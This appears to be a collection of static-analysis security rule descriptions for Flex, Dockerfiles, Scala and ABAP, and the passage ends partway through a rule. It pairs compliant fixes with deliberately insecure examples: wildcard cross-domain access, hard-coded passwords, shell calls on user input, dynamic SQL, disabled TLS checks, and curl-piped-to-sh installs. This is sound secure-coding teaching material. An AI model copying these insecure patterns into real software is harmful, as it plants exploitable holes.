A LocalConnection object is used to invoke a method in another LocalConnection object, either within a single SWF file or between multiple SWF files. This kind of local connection should be authorized only when the origin (domain) of the other Flex applications is perfectly defined.

Noncompliant code example

localConnection.allowDomain("*");

Compliant solution

localConnection.allowDomain("www.myDomain.com");
flex:S1468

Why is this an issue?

Calling Security.allowDomain("*") lets any domain cross-script into the domain of this SWF and exercise its functionality.

Noncompliant code example

Security.allowDomain("*");

Compliant solution

Security.allowDomain("www.myDomain.com");
flex:S1951

This rule is deprecated; use S4507 instead.

Why is this an issue?

The trace() function outputs debug statements, which can be read by anyone with a debug version of the Flash player. Because sensitive information could easily be exposed in this manner, trace() should never appear in production code.

Noncompliant code example

    var val:Number = doCalculation();
    trace("Calculation result: " + val);  // Noncompliant

Compliant solution

    var val:Number = doCalculation();

Resources

flex:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

if (unexpectedCondition)
{
  Alert.show("Unexpected Condition"); // Sensitive
}

The trace() function outputs debug statements, which can be read by anyone with a debug version of the Flash player:

var val:Number = doCalculation();
trace("Calculation result: " + val);  // Sensitive

See

flex:S1442

This rule is deprecated; use S4507 instead.

Why is this an issue?

Alert.show(...) can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive information to attackers, and should never be displayed.

Noncompliant code example

if (unexpectedCondition)
{
  Alert.show("Unexpected Condition");
}

Resources

docker:S6437

Why is this an issue?

Sensitive data has been found in the Dockerfile or Docker image. The data should be considered breached.

If malicious third parties can get a hold of such information, they could impersonate legitimate identities within the organization.
It is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

In Dockerfiles, secrets hard-coded, secrets passed through as variables or created at build-time will cause security risks. The secret information can be exposed either via the container environment itself, the image metadata or the build environment logs.

Docker Buildkit’s secret mount options should be used when secrets have to be accessed at build time. For run-time secrets, best practices would recommend only setting them at runtime, for example with the --env option of the docker run command.

Note that files exposing the secrets should be securely stored and not exposed to a large sphere. If possible, use a secret vault or another similar component. For example, Docker Swarm provides a secrets service that can be used to handle most confidential data.

Noncompliant code example

FROM example
ARG PASSWORD
# Noncompliant
RUN wget --user=guest --password="$PASSWORD" https://example.com

Compliant solution

For build-time secrets, use Buildkit’s secret mount type instead:

FROM example
RUN --mount=type=secret,id=build_secret \
    wget --user=guest --password=$(cat /run/secrets/build_secret) https://example.com

For runtime secrets, leave the environment variables empty until runtime:

FROM example
ENV ACCESS_TOKEN=""
CMD /run.sh

Store the runtime secrets in an environment file (such as .env) and then start the container with the --env-file argument:

docker run --env-file .env myImage

Resources

docker:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in cURL

Code examples

Noncompliant code example

FROM ubuntu:22.04

# Noncompliant
RUN curl --tlsv1.0 -O https://tlsv1-0.example.com/downloads/install.sh

Compliant solution

FROM ubuntu:22.04

RUN curl --tlsv1.2 -O https://tlsv1-3.example.com/downloads/install.sh

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

docker:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it

Code examples

The following code contains examples of disabled certificate validation.

Noncompliant code example

FROM ubuntu:22.04

# Noncompliant
RUN curl --insecure -O https://expired.example.com/downloads/install.sh

Compliant solution

FROM ubuntu:22.04

RUN curl -O https://new.example.com/downloads/install.sh

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

docker:S6469

Why is this an issue?

Docker offers a feature to mount files and directories for specific RUN instructions when building Docker images. This feature can be used to provide secrets to the commands that are executed during the build without baking them into the image. Additionally, it can be used to access SSH agents during the build.

By using the mode option the permissions of the secrets or agents can be modified. By default, access is limited to the root user.

When such secrets are exposed with lax permissions, they might get compromised during the image build process. A successful compromise can only happen during the execution of the command the mount option has been added to. While this might seem like a very hard exploitation requirement, supply chain attacks, and other related threats, should still be considered.

If you are executing a command as a low-privileged user and need to access secrets or agents, you can use the options uid and gid to provide access without having to resort to world-readable or writable permissions that might expose them to unintended parties.

Noncompliant code example

RUN --mount=type=secret,id=build_secret,mode=0777 ./installer.sh # Noncompliant

Compliant solution

RUN --mount=type=secret,id=build_secret,uid=1000 ./installer.sh

Resources

docker:S6502

Disabling builder sandboxes can lead to unauthorized access of the host system by malicious programs.

By default, programs executed by a RUN statement use only a subset of capabilities which are considered safe: this is called sandbox mode.

If you disable the sandbox with the --security=insecure option, the executed command can use the full set of Linux capabilities.
This can lead to a container escape. For example, an attacker with the SYS_ADMIN capability is able to mount devices from the host system.

This vulnerability allows an attacker who controls the behavior of the ran command to access the host system, break out of the container and penetrate the infrastructure.

After a successful intrusion, the underlying systems are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of service

Ask Yourself Whether

  • The program is controlled by an external entity.
  • The program is part of a supply chain that could be a victim of a supply chain attack.

There is a risk if you answered yes to either of these questions.

Recommended Secure Coding Practices

  • Whenever possible, the sandbox should stay enabled to reduce unnecessary risk.
  • If elevated capabilities are absolutely necessary, make sure to verify the integrity of the program before executing it.

Sensitive Code Example

# syntax=docker/dockerfile:1-labs
FROM ubuntu:22.04
# Sensitive
RUN --security=insecure ./example.sh

Compliant Solution

# syntax=docker/dockerfile:1-labs
FROM ubuntu:22.04
RUN ./example.sh
RUN --security=sandbox ./example.sh

See

docker:S6505

When installing dependencies, package managers like npm will automatically execute shell scripts distributed along with the source code. Post-install scripts, for example, are a common way to execute malicious code at install time whenever a package is compromised.

Ask Yourself Whether

  • The execution of dependency installation scripts is required for the application to function correctly.

There is a risk if you answered no to the question.

Recommended Secure Coding Practices

Execution of third-party scripts should be disabled if not strictly necessary for dependencies to work correctly. Doing this will reduce the attack surface and block a well-known supply chain attack vector.

Sensitive Code Example

FROM node:latest

# Sensitive
RUN npm install
FROM node:latest

# Sensitive
RUN yarn install

Compliant Solution

FROM node:latest

RUN npm install --ignore-scripts
FROM node:latest

RUN yarn install --ignore-scripts

See

docker:S6504

Ownership of an executable has been assigned to a user other than root. More often than not, resource owners have write permissions and thus can edit the resource.

Write permissions enable malicious actors, who got a foothold on the container, to tamper with the executable and thus manipulate the container’s expected behavior.
Manipulating executables could disrupt services or aid in escalating privileges inside the container.

This breaches the container immutability principle as it facilitates container changes during its life. Immutability, a container best practice, allows for a more reliable and reproducible behavior of Docker containers.

Resource ownership is not required; executables can be assigned execute permissions using chmod if needed.

Ask Yourself Whether

  • A non-root user has write permissions for the executable.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Use --chmod to change executable permissions at build-time.
  • Be mindful of the container immutability principle.

Sensitive Code Example

FROM example

RUN useradd exampleuser
# Sensitive
COPY --chown=exampleuser:exampleuser src.py dst.py

Compliant Solution

FROM example

COPY src.py dst.py

See

docker:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against tampering or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

RUN curl http://www.example.com/

Compliant Solution

RUN curl https://www.example.com/

See

docker:S6500

Installing recommended packages automatically can lead to vulnerabilities in the Docker image.

Potentially unnecessary packages are installed via a known Debian package manager. These packages will increase the attack surface of the created container as they might contain unidentified vulnerabilities or malicious code. Those packages could be used as part of a broader supply chain attack. In general, the more packages are installed in a container, the weaker its security posture is.
Depending on the introduced vulnerabilities, a malicious actor accessing such a container could use these for privilege escalation.
Removing unused packages can also significantly reduce your Docker image size.

To be secure, remove unused packages where possible and ensure images are subject to routine vulnerability scans.

Ask Yourself Whether

  • Container vulnerability scans are not performed.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Avoid installing package dependencies that are not strictly required.

Sensitive Code Example

FROM debian:latest

# Sensitive
RUN apt install -y build-essential

# Sensitive
RUN apt-get install -y build-essential

# Sensitive
RUN aptitude install -y build-essential

Compliant Solution

FROM debian:latest

RUN apt install -y --no-install-recommends build-essential

RUN apt-get install -y --no-install-recommends build-essential

RUN aptitude install -y --without-recommends build-essential

See

docker:S6506

The usage of HTTPS is not enforced here. As it is possible for the HTTP client to follow redirects, such redirects might lead to websites using HTTP.

As HTTP is a clear-text protocol, it is considered insecure. Due to its lack of encryption, attackers that are able to sniff traffic from the network can read, modify, or corrupt the transported content. Therefore, allowing redirects to HTTP can lead to several risks:

  • Exposure of sensitive data
  • Malware-infected software updates or installers
  • Corruption of critical information

Even in isolated networks, such as segmented cloud or offline environments, it is important to ensure the usage of HTTPS. If not, then insider threats with access to these environments might still be able to monitor or tamper with communications.

Ask Yourself Whether

  • It is possible for the requested resource to be redirected to an insecure location in the future.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Ensure that the HTTP client only accepts HTTPS pages. In curl this can be enabled using the option --proto "=https".
  • If it is not necessary to follow HTTP redirects, disable this in the HTTP client. In curl this is done by omitting the -L or --location option. In wget this is done by adding the option --max-redirect=0.

Sensitive Code Example

In the examples below, an install script is downloaded using curl or wget and then executed.

While connections made using HTTPS are generally considered secure, https://might-redirect.example.com/install.sh might redirect to a location that uses HTTP. Downloads made using HTTP are not secure and can be intercepted and modified. An attacker could modify the install script to run malicious code inside the container.

curl will not follow redirects unless either -L or --location option is used.

FROM ubuntu:22.04

# Sensitive
RUN curl --tlsv1.2 -sSf -L https://might-redirect.example.com/install.sh | sh

wget will follow redirects by default.

FROM ubuntu:22.04

# Sensitive
RUN wget --secure-protocol=TLSv1_2 -q -O - https://might-redirect.example.com/install.sh | sh

Compliant Solution

If you expect the server to redirect the download to a new location, curl can use the option --proto "=https" to ensure requests are only made using HTTPS. Any attempt to redirect to a location using HTTP will result in an error.

FROM ubuntu:22.04

RUN curl --proto "=https" --tlsv1.2 -sSf -L https://might-redirect.example.com/install.sh | sh

wget does not support this functionality so curl should be used instead.

If you expect the server to return the file without redirects, curl should not be instructed to follow redirects. Remove any -L or --location options from the command.

FROM ubuntu:22.04

RUN curl --tlsv1.2 -sSf https://might-redirect.example.com/install.sh | sh

wget uses the option --max-redirect=0 to disable redirects.

FROM ubuntu:22.04

RUN wget --secure-protocol=TLSv1_2 --max-redirect=0 -q -O - https://might-redirect.example.com/install.sh | sh

See

docker:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The container is designed to be a multi-user environment.
  • Services are run by dedicated low-privileged users to achieve privileges separation.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

To be secure, remove the unnecessary permissions. If required, use --chown to set the target user and group.

Sensitive Code Example

# Sensitive
ADD --chmod=777 src dst
# Sensitive
COPY --chmod=777 src dst
# Sensitive
RUN chmod +x resource
# Sensitive
RUN chmod u+s resource

Compliant Solution

ADD --chmod=754 src dst
COPY --chown=user:user --chmod=744 src dst
RUN chmod u+x resource
RUN chmod +t resource

See

docker:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

FROM example
# Sensitive
ENV APP_DEBUG=true
# Sensitive
ENV ENV=development
CMD /run.sh

Compliant Solution

FROM example
ENV APP_DEBUG=false
ENV ENV=production
CMD /run.sh

See

docker:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

FROM ubuntu:22.04

# Sensitive
RUN echo "a40216e7c028e7d77f1aec22d2bbd5f9a357016f  go1.20.linux-amd64.tar.gz" | sha1sum -c
RUN tar -C /usr/local -xzf go1.20.linux-amd64.tar.gz
ENV PATH="$PATH:/usr/local/go/bin"

Compliant Solution

FROM ubuntu:22.04

RUN echo "5a9ebcc65c1cce56e0d2dc616aff4c4cedcfbda8cc6f0288cc08cda3b18dcbf1  go1.20.linux-amd64.tar.gz" | sha256sum -c
RUN tar -C /usr/local -xzf go1.20.linux-amd64.tar.gz
ENV PATH="$PATH:/usr/local/go/bin"

See

docker:S6473

Exposing administration services can lead to unauthorized access of containers or escalation of privileges inside of containers.

A port that is commonly used for administration services is marked as being open through the EXPOSE command. Administration services like SSH might contain vulnerabilities, hard-coded credentials, or other security issues that increase the attack surface of a Docker deployment.
Even if the ports of the services do not get forwarded to the host system, by default they are reachable from other containers in the same network. A malicious actor that gets access to one container could use such services to escalate access and privileges.

Removing the EXPOSE command is not sufficient to be secure. The port is still open and the service accessible. To be secure, no administration services should be started. Instead, try to access the required information from the host system. For example, if the administration service is included to access logs or debug a service, you can do this from the host system instead. Docker allows you to read out any file that is inside of a container and to spawn a shell inside of a container if necessary.

Ask Yourself Whether

  • The container starts an administration service.

There is a risk if you answered yes to the question.

Recommended Secure Coding Practices

  • Do not start SSH, VNC, RDP or similar administration services in containers.

Sensitive Code Example

FROM ubuntu:22.04
# Sensitive
EXPOSE 22
CMD ["/usr/sbin/sshd", "-f", "/etc/ssh/sshd_config", "-D"]

See

docker:S6472

Using ENV and ARG to handle secrets can lead to sensitive information being disclosed to an inappropriate sphere.

The ARG and ENV instructions in a Dockerfile are used to configure the image build and the container environment respectively. Both can be used at image build time, during the execution of commands in the container, and ENV can also be used at runtime.

In most cases, build-time and environment variables are used to propagate configuration items from the host to the image or container. A typical example for an environmental variable is the PATH variable, used to configure where system executables are searched for.

Using ARG and ENV to propagate configuration entries that contain secrets causes a security risk. Indeed, in most cases, artifacts of those values are kept in the final image. The secret information leak can happen either in the container environment itself, the image metadata or the build environment logs.

The concrete impact of such an issue highly depends on the secret’s purpose and the exposure sphere:

  • Financial impact if a paid service API key is disclosed and used.
  • Application compromise if an application’s secret, like a session signing key, is disclosed.
  • Infrastructure component takeover, if a system secret, like a remote access key, is leaked.

Ask Yourself Whether

  • The variable contains a value that should be kept confidential.
  • The container image or Dockerfile will be distributed to users who do not need to know the secret value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use Buildkit’s secret mount options when secrets have to be used at build time.
  • For run time secret variables, best practices would recommend only setting them at runtime, for example with the --env option of the docker run command.

Note that, in both cases, the files exposing the secrets should be securely stored and not exposed to a large sphere. In most cases, using a secret vault or another similar component should be preferred. For example, Docker Swarm provides a secrets service that can be used to handle most confidential data.

Sensitive Code Example

FROM example
# Sensitive
ARG ACCESS_TOKEN
# Sensitive
ENV ACCESS_TOKEN=${ACCESS_TOKEN}
CMD /run.sh

Compliant Solution

For build time secrets, use Buildkit’s secret mount type instead:

FROM example
RUN --mount=type=secret,id=build_secret ./installer.sh

For runtime secrets, leave the environment variables empty until runtime:

FROM example
ENV ACCESS_TOKEN=""
CMD /run.sh

Store the runtime secrets in an environment file (such as .env) and then start the container with the --env-file argument:

docker run --env-file .env myImage

See

docker:S6497

A container image digest uniquely and immutably identifies a container image. A tag, on the other hand, is a mutable reference to a container image.

This tag can be updated to point to another version of the container at any point in time.
In general, the use of image digests instead of tags is intended to keep determinism stable within a system or infrastructure for reliability reasons.

The problem is that pulling such an image prevents the resulting container from being updated or patched in order to remove vulnerabilities or significant bugs.

Ask Yourself Whether

  • You expect to receive security updates of the base image.

There is a risk if you answer yes to this question.

Recommended Secure Coding Practices

Containers should get the latest security updates. If there is a need for determinism, the solution is to find tags that are not as prone to change as latest or shared tags.

To do so, favor a more precise tag that uses semantic versioning and target a major version, for example.

Sensitive Code Example

FROM mongo@sha256:8eb8f46e22f5ccf1feb7f0831d02032b187781b178cb971cd1222556a6cee9d1

RUN echo ls

Compliant Solution

Here, mongo:6.0 is better than using a digest, and better than using a more precise version, such as 6.0.4, because it would prevent 6.0.5 security updates:

FROM mongo:6.0

RUN echo ls

See

docker:S6431

Using host operating system namespaces can lead to compromise of the host system.
Opening network services of the local host system to the container creates a new attack surface for attackers.

Host network sharing could provide a significant performance advantage for workloads that require critical network performance. However, the successful exploitation of this attack vector could have a catastrophic impact on confidentiality within the host.

Ask Yourself Whether

  • The host exposes sensitive network services.
  • The container’s services performances do not rely on operating system namespaces.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not use host operating system namespaces.

Sensitive Code Example

# syntax=docker/dockerfile:1.3
FROM example
# Sensitive
RUN --network=host wget -O /home/sessions http://127.0.0.1:9000/sessions

Compliant Solution

# syntax=docker/dockerfile:1.3
FROM example
RUN --network=none wget -O /home/sessions http://127.0.0.1:9000/sessions

See

docker:S6470

When building a Docker image from a Dockerfile, a context directory is used and sent to the Docker daemon before the actual build starts. This context directory usually contains the Dockerfile itself, along with all the files that will be necessary for the build to succeed. This generally includes:

  • the source code of applications to set up in the container.
  • configuration files for other software components.
  • other necessary packages or components.

The COPY and ADD directives in the Dockerfiles are then used to actually copy content from the context directory to the image file system.

When COPY or ADD are used to recursively copy entire top-level directories or multiple items whose names are determined at build-time, unexpected files might get copied to the image filesystem. It could affect their confidentiality.

Ask Yourself Whether

  • The copied files and directories might contain sensitive data that should be kept confidential.
  • The context directory contains files and directories that have no functional purpose for the final container image.

There is a risk if you answered yes to any of those questions.

Keep in mind that the content of the context directory might change depending on the build environment and over time.

Recommended Secure Coding Practices

  • Limit the usage of globbing in the COPY and ADD sources definition.
  • Avoid copying the entire context directory to the image filesystem.
  • Prefer providing an explicit list of files and directories that are required for the image to properly run.

Sensitive Code Example

Copying the complete context directory:

FROM ubuntu:22.04
# Sensitive
COPY . .
CMD /run.sh

Copying multiple files and directories whose names are expanded at build time:

FROM ubuntu:22.04
# Sensitive
COPY ./example* /
COPY ./run.sh /
CMD /run.sh

Compliant Solution

FROM ubuntu:22.04
COPY ./example1 /example1
COPY ./example2 /example2
COPY ./run.sh /
CMD /run.sh

See

scala:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

val ip = "192.168.12.42" // Sensitive
val socket = new Socket(ip, 6667)

Compliant Solution

val ips = Source.fromFile(configuration_file).getLines.toList // Compliant
val socket = new Socket(ips(0), 6667)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

scala:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

See

abap:S4721

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process, indeed shell meta-chars can be used (when parameters are user-controlled for instance) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

CALL 'SYSTEM' ID 'COMMAND' FIELD usr_input ID 'TAB' FIELD TAB1.  " Sensitive

Compliant Solution

CALL 'SYSTEM' ID 'COMMAND' FIELD "/usr/bin/file.exe" ID 'TAB' FIELD TAB1.  " Compliant

See

abap:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

DATA: password(10) VALUE 'secret123',
           pwd(10) VALUE 'secret123'.

See

abap:S1493

There are two main reasons to ban dynamic clauses in SELECT statements.

The first relates to maintainability. One of the nice features of ABAP Design Time is the connection to the data dictionary; you get syntax errors if you try to address table fields that are not present anymore or that have typos. With dynamic SQL, the ability to statically check the code for this type of error is lost.

The other more critical reason relates to security. By definition, dynamic clauses make an application susceptible to SQL injection attacks.

Ask Yourself Whether

  • The SQL statement can be written without dynamic clauses.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not use dynamic clauses in "SELECT" statements.

Sensitive Code Example

SELECT (select_clause)
 FROM (from_clause) CLIENT SPECIFIED INTO <fs>
 WHERE (where_clause)
 GROUP BY (groupby_clause) HAVING (having_clause)
 ORDER BY (orderby_clause).

Compliant Solution

SELECT *
 FROM db_persons INTO us_persons
 WHERE country IS 'US'.

See

abap:S1492

Although the WHERE condition is optional in a SELECT statement, for performance and security reasons, a WHERE clause should always be specified to prevent reading the whole table.

Ask Yourself Whether

  • The whole table is not required.
  • The table contains sensitive information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Add a "WHERE" condition to "SELECT" statements.

Sensitive Code Example

SELECT * FROM db_persons INTO us_persons.

Compliant Solution

SELECT * FROM db_persons INTO us_persons WHERE country IS 'US'.

Exceptions

SELECT SINGLE and UP TO 1 ROWS result in only one record being read, so such SELECTs are ignored by this rule.

SELECT SINGLE * FROM db_persons INTO us_persons.

SELECT * FROM db_persons UP TO 1 ROWS INTO us_persons.
abap:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
